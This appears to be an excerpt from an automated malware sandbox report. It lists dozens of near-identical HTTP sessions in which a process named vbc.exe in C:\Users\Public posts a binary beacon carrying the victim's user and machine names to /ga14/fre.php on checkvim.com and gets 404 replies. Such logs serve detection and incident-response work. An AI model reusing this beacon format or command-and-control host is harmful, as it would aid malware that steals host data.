                    Sep 28, 2021 06:51:00.615942001 CEST277OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:00.899846077 CEST277INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.22492085.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:01.193569899 CEST278OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:01.260775089 CEST278OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:01.549926996 CEST279INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.22492095.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:01.859268904 CEST279OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:01.925920963 CEST280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:02.235016108 CEST280INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:13 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.22492105.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:02.517045021 CEST281OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:02.590136051 CEST281OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:02.885140896 CEST281INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.22492115.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:03.156872988 CEST282OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:03.226180077 CEST283OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:03.512490034 CEST283INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.22492125.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:03.819480896 CEST284OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:03.891371965 CEST284OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:04.183722019 CEST284INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:15 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.22492135.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:04.459249020 CEST285OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:04.527657986 CEST285OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:04.832232952 CEST286INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.22492145.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:05.091180086 CEST286OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:05.158267975 CEST287OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:05.442714930 CEST287INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.22491705.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:33.578149080 CEST225OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:33.642034054 CEST226OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:33.930838108 CEST226INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:45 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.22492155.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:05.699796915 CEST288OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:05.763216972 CEST288OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:06.041812897 CEST288INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:17 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.22492165.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:06.324511051 CEST289OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:06.398236990 CEST289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:06.690603018 CEST290INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.22492175.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:06.958702087 CEST291OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.028589964 CEST291OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:07.319648027 CEST291INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.22492185.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:07.603166103 CEST292OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.676136971 CEST292OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:07.964447021 CEST293INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.22492195.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:08.233326912 CEST293OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:08.300137997 CEST294OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:08.589641094 CEST294INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.22492205.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:08.841041088 CEST295OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:08.908215046 CEST295OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:09.186378002 CEST295INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:20 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    56192.168.2.22492215.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:09.444019079 CEST296OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:09.507039070 CEST296OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:09.822865009 CEST297INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    57192.168.2.22492225.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:10.077282906 CEST298OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:10.141413927 CEST298OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:10.430119991 CEST298INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    58192.168.2.22492235.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:10.687077999 CEST299OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:10.754905939 CEST299OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:11.051527977 CEST299INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:22 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    59192.168.2.22492245.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:11.328728914 CEST300OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:11.393167019 CEST301OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:11.678843021 CEST301INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.22491715.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:36.333899975 CEST227OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:36.403243065 CEST227OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:36.694550991 CEST227INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    60192.168.2.22492255.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:11.924108982 CEST302OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
